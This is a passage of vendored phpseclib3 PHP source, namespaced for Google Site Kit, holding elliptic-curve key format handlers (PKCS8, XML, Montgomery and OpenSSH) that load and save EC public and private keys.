Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted EC Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS8 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 { use Common; /** * OID Name * * @var array */ const OID_NAME = ['id-ecPublicKey', 'id-Ed25519', 'id-Ed448']; /** * OID Value * * @var string */ const OID_VALUE = ['1.2.840.10045.2.1', '1.3.101.112', '1.3.101.113']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { // initialize_static_variables() is defined in both the trait and the parent class // when it's defined in two places it's the traits one that's called // the parent one is needed, as well, but the parent one is called by other methods // in the parent class as needed and in the context of the parent it's the parent // one that's called self::initialize_static_variables(); $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; switch ($key[$type . 'Algorithm']['algorithm']) { case 'id-Ed25519': case 'id-Ed448': return self::loadEdDSA($key); } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); if (!$params) { throw new \RuntimeException('Google\\Site_Kit_Dependencies\\Unable to decode the parameters using Maps\\ECParameters'); } $components = []; $components['curve'] = self::loadCurveByParam($params); if ($type == 'publicKey') { $components['QA'] = self::extractPoint("\x00" . $key['publicKey'], $components['curve']); return $components; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key['privateKey']); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPrivateKey::MAP); if (isset($key['parameters']) && $params != $key['parameters']) { throw new \RuntimeException('The PKCS8 parameter field does not match the private key parameter field'); } $components['dA'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($key['privateKey'], 256); $components['curve']->rangeCheck($components['dA']); $components['QA'] = isset($key['publicKey']) ? self::extractPoint($key['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Break a public or private EdDSA key down into its constituent components * * @return array */ private static function loadEdDSA(array $key) { $components = []; if (isset($key['privateKey'])) { $components['curve'] = $key['privateKeyAlgorithm']['algorithm'] == 'id-Ed25519' ? new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519() : new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448(); $expected = \chr(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING) . \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeLength($components['curve']::SIZE); if (\substr($key['privateKey'], 0, 2) != $expected) { throw new \RuntimeException('The first two bytes of the ' . $key['privateKeyAlgorithm']['algorithm'] . ' private key field should be 0x' . \bin2hex($expected)); } $arr = $components['curve']->extractSecret(\substr($key['privateKey'], 2)); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } if (isset($key['publicKey'])) { if (!isset($components['curve'])) { $components['curve'] = $key['publicKeyAlgorithm']['algorithm'] == 'id-Ed25519' ? new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519() : new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448(); } $components['QA'] = self::extractPoint($key['publicKey'], $components['curve']); } if (isset($key['privateKey']) && !isset($components['QA'])) { $components['QA'] = $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); } return $components; } /** * Convert an EC public key to the appropriate format * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, array $options = []) { self::initialize_static_variables(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Montgomery Curves are not supported'); } if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return self::wrapPublicKey($curve->encodePoint($publicKey), null, $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 ? 'id-Ed25519' : 'id-Ed448', $options); } $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(self::encodeParameters($curve, \false, $options)); $key = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); return self::wrapPublicKey($key, $params, 'id-ecPublicKey', $options); } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, $secret = null, $password = '', array $options = []) { self::initialize_static_variables(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Montgomery Curves are not supported'); } if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return self::wrapPrivateKey(\chr(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING) . \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeLength($curve::SIZE) . $secret, [], null, $password, $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 ? 'id-Ed25519' : 'id-Ed448'); } $publicKey = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(self::encodeParameters($curve, \false, $options)); $key = [ 'version' => 'ecPrivkeyVer1', 'privateKey' => $privateKey->toBytes(), //'parameters' => $params, 'publicKey' => "\x00" . $publicKey, ]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPrivateKey::MAP); return self::wrapPrivateKey($key, [], $params, $password, 'id-ecPublicKey', '', $options); } } <?php /** * XML Formatted EC Key Handler * * More info: * * https://www.w3.org/TR/xmldsig-core/#sec-ECKeyValue * http://en.wikipedia.org/wiki/XML_Signature * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime as PrimeCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * XML Formatted EC Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class XML { use Common; /** * Default namespace * * @var string */ private static $namespace; /** * Flag for using RFC4050 syntax * * @var bool */ private static $rfc4050 = \false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (!\class_exists('DOMDocument')) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('The dom extension is not setup correctly on this system'); } $use_errors = \libxml_use_internal_errors(\true); $temp = self::isolateNamespace($key, 'http://www.w3.org/2009/xmldsig11#'); if ($temp) { $key = $temp; } $temp = self::isolateNamespace($key, 'http://www.w3.org/2001/04/xmldsig-more#'); if ($temp) { $key = $temp; } $dom = new \DOMDocument(); if (\substr($key, 0, 5) != '<?xml') { $key = '<xml>' . $key . '</xml>'; } if (!$dom->loadXML($key)) { \libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); \libxml_use_internal_errors($use_errors); $curve = self::loadCurveByParam($xpath); $pubkey = self::query($xpath, 'publickey', 'Public Key is not present'); $QA = self::query($xpath, 'ecdsakeyvalue')->length ? self::extractPointRFC4050($xpath, $curve) : self::extractPoint("\x00" . $pubkey, $curve); \libxml_use_internal_errors($use_errors); return \compact('curve', 'QA'); } /** * Case-insensitive xpath query * * @param \DOMXPath $xpath * @param string $name * @param string $error optional * @param bool $decode optional * @return \DOMNodeList */ private static function query(\DOMXPath $xpath, $name, $error = null, $decode = \true) { $query = '/'; $names = \explode('/', $name); foreach ($names as $name) { $query .= "/*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='{$name}']"; } $result = $xpath->query($query); if (!isset($error)) { return $result; } if (!$result->length) { throw new \RuntimeException($error); } return $decode ? self::decodeValue($result->item(0)->textContent) : $result->item(0)->textContent; } /** * Finds the first element in the relevant namespace, strips the namespacing and returns the XML for that element. * * @param string $xml * @param string $ns */ private static function isolateNamespace($xml, $ns) { $dom = new \DOMDocument(); if (!$dom->loadXML($xml)) { return \false; } $xpath = new \DOMXPath($dom); $nodes = $xpath->query("//*[namespace::*[.='{$ns}'] and not(../namespace::*[.='{$ns}'])]"); if (!$nodes->length) { return \false; } $node = $nodes->item(0); $ns_name = $node->lookupPrefix($ns); if ($ns_name) { $node->removeAttributeNS($ns, $ns_name); } return $dom->saveXML($node); } /** * Decodes the value * * @param string $value */ private static function decodeValue($value) { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode(\str_replace(["\r", "\n", ' ', "\t"], '', $value)); } /** * Extract points from an XML document * * @param \DOMXPath $xpath * @param BaseCurve $curve * @return object[] */ private static function extractPointRFC4050(\DOMXPath $xpath, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve) { $x = self::query($xpath, 'publickey/x'); $y = self::query($xpath, 'publickey/y'); if (!$x->length || !$x->item(0)->hasAttribute('Value')) { throw new \RuntimeException('Public Key / X coordinate not found'); } if (!$y->length || !$y->item(0)->hasAttribute('Value')) { throw new \RuntimeException('Public Key / Y coordinate not found'); } $point = [$curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($x->item(0)->getAttribute('Value'))), $curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($y->item(0)->getAttribute('Value')))]; if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param \DomXPath $xpath * @return BaseCurve|false */ private static function loadCurveByParam(\DOMXPath $xpath) { $namedCurve = self::query($xpath, 'namedcurve'); if ($namedCurve->length == 1) { $oid = $namedCurve->item(0)->getAttribute('URN'); $oid = \preg_replace('#[^\\d.]#', '', $oid); $name = \array_search($oid, self::$curveOIDs); if ($name === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Curve with OID of ' . $oid . ' is not supported'); } $curve = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . $name; if (!\class_exists($curve)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Named Curve of ' . $name . ' is not supported'); } return new $curve(); } $params = self::query($xpath, 'explicitparams'); if ($params->length) { return self::loadCurveByParamRFC4050($xpath); } $params = self::query($xpath, 'ecparameters'); if (!$params->length) { throw new \RuntimeException('No parameters are present'); } $fieldTypes = ['prime-field' => ['fieldid/prime/p'], 'gnb' => ['fieldid/gnb/m'], 'tnb' => ['fieldid/tnb/k'], 'pnb' => ['fieldid/pnb/k1', 'fieldid/pnb/k2', 'fieldid/pnb/k3'], 'unknown' => []]; foreach ($fieldTypes as $type => $queries) { foreach ($queries as $query) { $result = self::query($xpath, $query); if (!$result->length) { continue 2; } $param = \preg_replace('#.*/#', '', $query); ${$param} = self::decodeValue($result->item(0)->textContent); } break; } $a = self::query($xpath, 'curve/a', 'A coefficient is not present'); $b = self::query($xpath, 'curve/b', 'B coefficient is not present'); $base = self::query($xpath, 'base', 'Base point is not present'); $order = self::query($xpath, 'order', 'Order is not present'); switch ($type) { case 'prime-field': $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime(); $curve->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($p, 256)); $curve->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($a, 256), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($b, 256)); $point = self::extractPoint("\x00" . $base, $curve); $curve->setBasePoint(...$point); $curve->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($order, 256)); return $curve; case 'gnb': case 'tnb': case 'pnb': default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Field Type of ' . $type . ' is not supported'); } } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param \DomXPath $xpath * @return BaseCurve|false */ private static function loadCurveByParamRFC4050(\DOMXPath $xpath) { $fieldTypes = ['prime-field' => ['primefieldparamstype/p'], 'unknown' => []]; foreach ($fieldTypes as $type => $queries) { foreach ($queries as $query) { $result = self::query($xpath, $query); if (!$result->length) { continue 2; } $param = \preg_replace('#.*/#', '', $query); ${$param} = $result->item(0)->textContent; } break; } $a = self::query($xpath, 'curveparamstype/a', 'A coefficient is not present', \false); $b = self::query($xpath, 'curveparamstype/b', 'B coefficient is not present', \false); $x = self::query($xpath, 'basepointparams/basepoint/ecpointtype/x', 'Base Point X is not present', \false); $y = self::query($xpath, 'basepointparams/basepoint/ecpointtype/y', 'Base Point Y is not present', \false); $order = self::query($xpath, 'order', 'Order is not present', \false); switch ($type) { case 'prime-field': $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime(); $p = \str_replace(["\r", "\n", ' ', "\t"], '', $p); $curve->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($p)); $a = \str_replace(["\r", "\n", ' ', "\t"], '', $a); $b = \str_replace(["\r", "\n", ' ', "\t"], '', $b); $curve->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($a), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($b)); $x = \str_replace(["\r", "\n", ' ', "\t"], '', $x); $y = \str_replace(["\r", "\n", ' ', "\t"], '', $y); $curve->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($x), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($y)); $order = \str_replace(["\r", "\n", ' ', "\t"], '', $order); $curve->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($order)); return $curve; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Field Type of ' . $type . ' is not supported'); } } /** * Sets the namespace. dsig11 is the most common one. * * Set to null to unset. Used only for creating public keys. * * @param string $namespace */ public static function setNamespace($namespace) { self::$namespace = $namespace; } /** * Uses the XML syntax specified in https://tools.ietf.org/html/rfc4050 */ public static function enableRFC4050Syntax() { self::$rfc4050 = \true; } /** * Uses the XML syntax specified in https://www.w3.org/TR/xmldsig-core/#sec-ECParameters */ public static function disableRFC4050Syntax() { self::$rfc4050 = \false; } /** * Convert a public key to the appropriate format * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, array $options = []) { self::initialize_static_variables(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards || $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('TwistedEdwards and Montgomery Curves are not supported'); } if (empty(static::$namespace)) { $pre = $post = ''; } else { $pre = static::$namespace . ':'; $post = ':' . static::$namespace; } if (self::$rfc4050) { return '<' . $pre . 'ECDSAKeyValue xmlns' . $post . '="http://www.w3.org/2001/04/xmldsig-more#">' . "\r\n" . self::encodeXMLParameters($curve, $pre, $options) . "\r\n" . '<' . $pre . 'PublicKey>' . "\r\n" . '<' . $pre . 'X Value="' . $publicKey[0] . '" />' . "\r\n" . '<' . $pre . 'Y Value="' . $publicKey[1] . '" />' . "\r\n" . '</' . $pre . 'PublicKey>' . "\r\n" . '</' . $pre . 'ECDSAKeyValue>'; } $publicKey = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); return '<' . $pre . 'ECDSAKeyValue xmlns' . $post . '="http://www.w3.org/2009/xmldsig11#">' . "\r\n" . self::encodeXMLParameters($curve, $pre, $options) . "\r\n" . '<' . $pre . 'PublicKey>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($publicKey) . '</' . $pre . 'PublicKey>' . "\r\n" . '</' . $pre . 'ECDSAKeyValue>'; } /** * Encode Parameters * * @param BaseCurve $curve * @param string $pre * @param array $options optional * @return string|false */ private static function encodeXMLParameters(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, $pre, array $options = []) { $result = self::encodeParameters($curve, \true, $options); if (isset($result['namedCurve'])) { $namedCurve = '<' . $pre . 'NamedCurve URI="urn:oid:' . self::$curveOIDs[$result['namedCurve']] . '" />'; return self::$rfc4050 ? '<DomainParameters>' . \str_replace('URI', 'URN', $namedCurve) . '</DomainParameters>' : $namedCurve; } if (self::$rfc4050) { $xml = '<' . $pre . 'ExplicitParams>' . "\r\n" . '<' . $pre . 'FieldParams>' . "\r\n"; $temp = $result['specifiedCurve']; switch ($temp['fieldID']['fieldType']) { case 'prime-field': $xml .= '<' . $pre . 'PrimeFieldParamsType>' . "\r\n" . '<' . $pre . 'P>' . $temp['fieldID']['parameters'] . '</' . $pre . 'P>' . "\r\n" . '</' . $pre . 'PrimeFieldParamsType>' . "\r\n"; $a = $curve->getA(); $b = $curve->getB(); list($x, $y) = $curve->getBasePoint(); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Field Type of ' . $temp['fieldID']['fieldType'] . ' is not supported'); } $xml .= '</' . $pre . 'FieldParams>' . "\r\n" . '<' . $pre . 'CurveParamsType>' . "\r\n" . '<' . $pre . 'A>' . $a . '</' . $pre . 'A>' . "\r\n" . '<' . $pre . 'B>' . $b . '</' . $pre . 'B>' . "\r\n" . '</' . $pre . 'CurveParamsType>' . "\r\n" . '<' . $pre . 'BasePointParams>' . "\r\n" . '<' . $pre . 'BasePoint>' . "\r\n" . '<' . $pre . 'ECPointType>' . "\r\n" . '<' . $pre . 'X>' . $x . '</' . $pre . 'X>' . "\r\n" . '<' . $pre . 'Y>' . $y . '</' . $pre . 'Y>' . "\r\n" . '</' . $pre . 'ECPointType>' . "\r\n" . '</' . $pre . 'BasePoint>' . "\r\n" . '<' . $pre . 'Order>' . $curve->getOrder() . '</' . $pre . 'Order>' . "\r\n" . '</' . $pre . 'BasePointParams>' . "\r\n" . '</' . $pre . 'ExplicitParams>' . "\r\n"; return $xml; } if (isset($result['specifiedCurve'])) { $xml = '<' . $pre . 'ECParameters>' . "\r\n" . '<' . $pre . 'FieldID>' . "\r\n"; $temp = $result['specifiedCurve']; switch ($temp['fieldID']['fieldType']) { case 'prime-field': $xml .= '<' . $pre . 'Prime>' . "\r\n" . '<' . $pre . 'P>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($temp['fieldID']['parameters']->toBytes()) . '</' . $pre . 'P>' . "\r\n" . '</' . $pre . 'Prime>' . "\r\n"; break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Field Type of ' . $temp['fieldID']['fieldType'] . ' is not supported'); } $xml .= '</' . $pre . 'FieldID>' . "\r\n" . '<' . $pre . 'Curve>' . "\r\n" . '<' . $pre . 'A>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($temp['curve']['a']) . '</' . $pre . 'A>' . "\r\n" . '<' . $pre . 'B>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($temp['curve']['b']) . '</' . $pre . 'B>' . "\r\n" . '</' . $pre . 'Curve>' . "\r\n" . '<' . $pre . 'Base>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($temp['base']) . '</' . $pre . 'Base>' . "\r\n" . '<' . $pre . 'Order>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($temp['order']) . '</' . $pre . 'Order>' . "\r\n" . '</' . $pre . 'ECParameters>'; return $xml; } } } <?php /** * Montgomery Private Key Handler * * "Naked" Curve25519 private keys can pretty much be any sequence of random 32x bytes so unless * we have a "hidden" key handler pretty much every 32 byte string will be loaded as a curve25519 * private key even if it probably isn't one by PublicKeyLoader. * * "Naked" Curve25519 public keys also a string of 32 bytes so distinguishing between a "naked" * curve25519 private key and a public key is nigh impossible, hence separate plugins for each * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve448; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Montgomery Curve Private Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class MontgomeryPrivate { /** * Is invisible flag * */ const IS_INVISIBLE = \true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (\strlen($key)) { case 32: $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519(); break; case 56: $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve448(); break; default: throw new \LengthException('The only supported lengths are 32 and 56'); } $components = ['curve' => $curve]; $components['dA'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($key, 256); $curve->rangeCheck($components['dA']); // note that EC::getEncodedCoordinates does some additional "magic" (it does strrev on the result) $components['QA'] = $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Convert an EC public key to the appropriate format * * @param MontgomeryCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve, array $publicKey) { return \strrev($publicKey[0]->toBytes()); } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param MontgomeryCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve, array $publicKey, $secret = null, $password = '') { if (!empty($password) && \is_string($password)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('MontgomeryPrivate private keys do not support encryption'); } return $privateKey->toBytes(); } } <?php /** * Montgomery Public Key Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve448; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Montgomery Public Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class MontgomeryPublic { /** * Is invisible flag * */ const IS_INVISIBLE = \true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (\strlen($key)) { case 32: $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519(); break; case 56: $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve448(); break; default: throw new \LengthException('The only supported lengths are 32 and 56'); } $components = ['curve' => $curve]; $components['QA'] = [$components['curve']->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev($key), 256))]; return $components; } /** * Convert an EC public key to the appropriate format * * @param MontgomeryCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve, array $publicKey) { return \strrev($publicKey[0]->toBytes()); } } <?php /** * OpenSSH Formatted EC Key Handler * * PHP version 5 * * Place in $HOME/.ssh/authorized_keys * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * OpenSSH Formatted EC Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSH extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH { use Common; /** * Supported Key Types * * @var array */ protected static $types = ['ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp521', 'ssh-ed25519']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { $paddedKey = $parsed['paddedKey']; list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $paddedKey); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ({$type} vs {$parsed['type']})"); } if ($type == 'ssh-ed25519') { list(, $key, $comment) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('sss', $paddedKey); $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\libsodium::load($key); $key['comment'] = $comment; return $key; } list($curveName, $publicKey, $privateKey, $comment) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ssis', $paddedKey); $curve = self::loadCurveByParam(['namedCurve' => $curveName]); $curve->rangeCheck($privateKey); return ['curve' => $curve, 'dA' => $privateKey, 'QA' => self::extractPoint("\x00{$publicKey}", $curve), 'comment' => $comment]; } if ($parsed['type'] == 'ssh-ed25519') { if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($parsed['publicKey'], 4) != "\x00\x00\x00 ") { throw new \RuntimeException('Length of ssh-ed25519 key should be 32'); } $curve = new 